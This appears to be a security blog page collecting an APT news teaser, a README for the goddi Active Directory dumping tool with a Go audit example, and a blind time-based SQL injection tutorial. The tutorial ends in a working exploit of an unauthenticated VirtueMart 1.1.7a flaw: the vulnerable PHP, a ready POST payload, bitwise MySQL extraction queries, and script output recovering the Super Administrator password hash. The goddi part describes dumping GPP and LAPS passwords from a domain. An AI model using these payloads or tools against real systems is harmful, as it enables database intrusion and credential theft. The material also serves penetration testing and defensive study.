
Sunday, August 30, 2020

APT Hackers Exploit Autodesk 3D Max Software For Industrial Espionage

It's one thing for APT groups to conduct cyber espionage to meet their own financial objectives. But it's an entirely different matter when they are used as "hackers for hire" by competing private companies to make away with confidential information. Bitdefender's Cyber Threat Intelligence Lab discovered yet another instance of an espionage attack targeting an unnamed international

via The Hacker News

Goddi (Go Dump Domain Info) - Dumps Active Directory Domain Information



Based on work from Scott Sutherland (@_nullbind), Antti Rantasaari, Eric Gruber (@egru), Will Schroeder (@harmj0y), and the PowerView authors.

Install
Use the executables in the releases section. If you want to build it yourself, make sure your Go environment is set up according to the Go setup doc. goddi also depends on the following package:
go get gopkg.in/ldap.v2

Windows
Tested on Windows 10 and 8.1 (go1.10 windows/amd64).

Linux
Tested on Kali Linux (go1.10 linux/amd64).
  • umount, mount and cifs-utils must be installed so GetGPP can mount the share it reads Group Policy Preference files from
apt-get update
apt-get install -y mount cifs-utils
  • make sure nothing is mounted at /mnt/goddi/
  • make sure to run with sudo

Run
By default goddi connects over TLS (Go's tls.Client) to port 636 (LDAPS). On Linux, run it with sudo so the share can be mounted.
  • username: Target user. Required parameter.
  • password: Target user's password. Required parameter.
  • domain: Full domain name. Required parameter.
  • dc: DC to target. Can be either an IP or full hostname. Required parameter.
  • startTLS: Use StartTLS on port 389 instead of LDAPS.
  • unsafe: Use a plaintext connection on port 389. The simple bind then sends the target user's credentials unencrypted.
PS C:\Users\Administrator\Desktop> .\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe
[i] Begin PLAINTEXT LDAP connection to 'dc.test.local'...
[i] PLAINTEXT LDAP connection to 'dc.test.local' successful...
[i] Begin BIND...
[i] BIND with 'testuser' successful...
[i] Begin dump domain info...
[i] Domain Trusts: 1 found
[i] Domain Controllers: 1 found
[i] Users: 12 found
[*] Warning: keyword 'pass' found!
[*] Warning: keyword 'fall' found!
[i] Domain Admins: 4 users found
[i] Enterprise Admins: 1 users found
[i] Forest Admins: 0 users found
[i] Locked Users: 0 found
[i] Disabled Users: 2 found
[i] Groups: 45 found
[i] Domain Sites: 1 found
[i] Domain Subnets: 0 found
[i] Domain Computers: 17 found
[i] Deligated Users: 0 found
[i] Users with passwords not set to expire: 6 found
[i] Machine Accounts with passwords older than 45 days: 18 found
[i] Domain OUs: 8 found
[i] Domain Account Policy found
[i] Domain GPOs: 7 found
[i] FSMO Roles: 3 found
[i] SPNs: 122 found
[i] LAPS passwords: 0 found
[i] GPP enumeration starting. This can take a bit...
[i] GPP passwords: 7 found
[i] CSVs written to 'csv' directory in C:\Users\Administrator\Desktop
[i] Execution took 1.4217256s...
[i] Exiting...

Functionality
StartTLS and TLS (tls.Client) connections are supported; TLS is the default. All output goes to CSV files created in a csv/ directory under the current working directory. Dumps:
  • Domain users. The Description attribute is also searched for keywords (e.g. "Password") and any hits are written to a separate CSV.
  • Users in privileged groups (Domain Admins, Enterprise Admins, Forest Admins).
  • Users with passwords not set to expire.
  • User accounts that have been locked or disabled.
  • Machine accounts with passwords older than 45 days.
  • Domain Computers.
  • Domain Controllers.
  • Sites and Subnets.
  • SPNs, with a flag column in the SPN CSV marking the accounts that are Domain Admins.
  • Trusted domain relationships.
  • Domain Groups.
  • Domain OUs.
  • Domain Account Policy.
  • Domain delegation users.
  • Domain GPOs.
  • Domain FSMO roles.
  • LAPS passwords.
  • GPP passwords. On Windows the share is mapped as drive Q: by default; if that letter is taken, R:, S: and so on are tried until one succeeds. On Linux the share is mounted at /mnt/goddi.
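The checks behind several of those counters can be reproduced offline. The following Go program is an added example written for this page, not goddi's own code: it applies the userAccountControl flag tests, the description keyword search and the 45-day machine-password age check to a constructed slice of entries standing in for LDAP search results, and shows the bitwise-AND LDAP filters a dumper sends so the DC does the flag test server-side. The entries, keywords and the Entry/Audit/Findings names are assumptions made for the example.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// userAccountControl flag bits, per Microsoft's documentation of the attribute.
const (
	uacAccountDisable   = 0x0002
	uacDontExpirePasswd = 0x10000
)

// LDAP filters of the kind a dumper like goddi sends. 1.2.840.113556.1.4.803 is
// LDAP_MATCHING_RULE_BIT_AND, so the DC performs the flag test server-side.
const (
	FilterNeverExpire = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
	FilterDisabled    = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))"
	FilterComputers   = "(objectCategory=computer)"
)

// Entry is a constructed stand-in for the attributes an *ldap.Entry would carry.
type Entry struct {
	SAMAccountName     string
	Description        string
	UserAccountControl int
	PwdLastSet         int64 // Windows FILETIME: 100ns ticks since 1601-01-01 UTC
}

// filetimeEpochDiff is the count of 100ns ticks between 1601-01-01 and 1970-01-01.
const filetimeEpochDiff int64 = 116444736000000000

// FiletimeToTime converts the integer AD stores in pwdLastSet to a time.Time.
func FiletimeToTime(ft int64) time.Time {
	return time.Unix(0, (ft-filetimeEpochDiff)*100).UTC()
}

// TimeToFiletime is the inverse; used here only to build the sample data.
func TimeToFiletime(t time.Time) int64 {
	return t.UnixNano()/100 + filetimeEpochDiff
}

// KeywordHits returns the keywords that occur (case-insensitively) in a description.
func KeywordHits(description string, keywords []string) []string {
	var hits []string
	lower := strings.ToLower(description)
	for _, kw := range keywords {
		if strings.Contains(lower, strings.ToLower(kw)) {
			hits = append(hits, kw)
		}
	}
	return hits
}

// Findings mirrors the counters goddi prints at the end of a run.
type Findings struct {
	NeverExpire     []string
	Disabled        []string
	StaleMachines   []string
	KeywordWarnings map[string][]string // sAMAccountName -> keywords found
}

// Audit applies the checks to every entry. maxAge is the machine-account
// password age threshold (goddi reports accounts older than 45 days).
func Audit(entries []Entry, now time.Time, keywords []string, maxAge time.Duration) Findings {
	f := Findings{KeywordWarnings: map[string][]string{}}
	for _, e := range entries {
		if hits := KeywordHits(e.Description, keywords); len(hits) > 0 {
			f.KeywordWarnings[e.SAMAccountName] = hits
		}
		if strings.HasSuffix(e.SAMAccountName, "$") { // machine account
			if now.Sub(FiletimeToTime(e.PwdLastSet)) > maxAge {
				f.StaleMachines = append(f.StaleMachines, e.SAMAccountName)
			}
			continue
		}
		if e.UserAccountControl&uacDontExpirePasswd != 0 {
			f.NeverExpire = append(f.NeverExpire, e.SAMAccountName)
		}
		if e.UserAccountControl&uacAccountDisable != 0 {
			f.Disabled = append(f.Disabled, e.SAMAccountName)
		}
	}
	return f
}

// SampleEntries is constructed data, not output from any real domain.
func SampleEntries(now time.Time) []Entry {
	return []Entry{
		{"svc_backup", "Backup service. Password is Fall2019!", 0x10200, TimeToFiletime(now.AddDate(0, 0, -400))},
		{"jdoe", "Left the company", 0x0202, TimeToFiletime(now.AddDate(0, 0, -30))},
		{"WS01$", "", 0x1000, TimeToFiletime(now.AddDate(0, 0, -60))},
		{"DC01$", "", 0x82000, TimeToFiletime(now.AddDate(0, 0, -10))},
	}
}

func main() {
	now := time.Now()
	f := Audit(SampleEntries(now), now, []string{"pass", "fall"}, 45*24*time.Hour)
	for user, kws := range f.KeywordWarnings {
		fmt.Printf("[*] Warning: keywords %v found in description of %s\n", kws, user)
	}
	fmt.Printf("[i] Users with passwords not set to expire: %d found\n", len(f.NeverExpire))
	fmt.Printf("[i] Disabled Users: %d found\n", len(f.Disabled))
	fmt.Printf("[i] Machine Accounts with passwords older than 45 days: %d found\n", len(f.StaleMachines))
}
```

The keyword "fall" in goddi's warning output above is worth keeping in your own list: seasonal passwords ("Fall2019") written into account descriptions are a common find. Against a live domain, pwdLastSet comes back as a decimal string and must be parsed into the int64 before conversion.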



Bit Banging Your Database

This post is about stealing data from a database one bit at a time. Most of the time pulling data out a bit at a time would be neither ideal nor desirable, but in certain cases it works just fine, for instance a blind time-based SQL injection. To bring anyone who is not familiar with a "blind time-based" SQL injection up to speed: it is the situation where you can inject into a SQL statement the database executes, but the application gives no indication of the result of the query. It is normally exploited by injecting boolean conditions into the query and making the database pause for a fixed amount of time whenever the condition is true, so the response time leaks one yes/no answer per request. Think of it as playing "Guess Who" with the database.

Now that the basic idea is out of the way, we can move on to how this is normally done and then to the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where the item lives we first determine its length; take an administrator's username as the example. All examples below are executed on a MySQL database hosting a Joomla install, so the query we would like to run is:
select length(username) from jos_users where usertype = 'Super Administrator';
Because the application never returns the value to us, we instead have to ask a series of yes/no questions, one query at a time:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number the length is compared against until the database paused (meaning the benchmark() branch was taken). In this case it would take 5 requests until the statement was true and the benchmark was hit.

Examples showing time difference:
mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
In the case of the password the value is 65 characters long, so finding its length with the comparison approach would take 65 requests. This is where we get to the topic of the post: the length of any value up to 255 can be recovered in exactly 8 requests. Instead of comparing against each candidate length, we test the value one bit at a time, using a bitwise AND as the boolean condition. Start with the most significant bit and work down to the least significant. For a value of 65 (binary 01000001) the eight tests look like this:

mask   value & mask           result     bit set?
128    01000001 & 10000000    00000000   no
 64    01000001 & 01000000    01000000   yes
 32    01000001 & 00100000    00000000   no
 16    01000001 & 00010000    00000000   no
  8    01000001 & 00001000    00000000   no
  4    01000001 & 00000100    00000000   no
  2    01000001 & 00000010    00000000   no
  1    01000001 & 00000001    00000001   yes

The rows with a non-zero result (masks 64 and 1) are where a bit is set, and a non-zero value is exactly what satisfies the boolean condition in MySQL's if(). The following example runs the same tests against the database, with a benchmark() delay marking each set bit:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
Whenever the boolean condition is satisfied the response is delayed, so that bit is marked as set (1) and the bits whose queries returned immediately as unset (0). That gives 01000001, or 65. Knowing how long the target value is, we can move on to extracting its contents. Normally this is done with a substring function, moving through the value one character at a time: at each offset the character is compared against a list of candidates until the boolean condition is satisfied, indicating the correct character has been found. For example:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works, but the ordering of the character set you search with determines how many requests each character costs, especially for case-sensitive values. Consider the following password hash (a 32-character MD5, a colon and a 32-character salt, 65 characters in all):
da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
Searching for this string one character at a time with the character set [0-9A-Za-z] would take about 1400 requests. Applying the bit-at-a-time method instead costs a fixed 8 requests per character, 520 requests in total (65*8). The following example shows the extraction of the first character of this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
The three queries that paused (masks 64, 32 and 4) are the set bits, giving 01100100, i.e. 100, which is 'd'. The substring offset is then incremented and the next character recovered the same way, until the length found earlier is reached.

Now that the brief lesson is over we can move on to actually exploiting something with this technique. Our target is VirtueMart, a free shopping cart component (com_virtuemart) for the Joomla platform. A while back I had found an unauthenticated SQL injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php":


if($order_id === "" || $order_id === null)
{
    $vmLogger->debug("Could not find order ID via invoice");
    $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);

    // $txn_id comes straight from the POST parameter and is concatenated unescaped
    $qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
    $db->query($qv);
    print($qv);
    if( !$db->next_record()) {
        $vmLogger->err("Error: No Records Found.");
    }
}
The $txn_id variable is taken from the POST parameter of the same name and placed in the query without any escaping. The following request therefore makes the web server pause before responding:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#
Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.

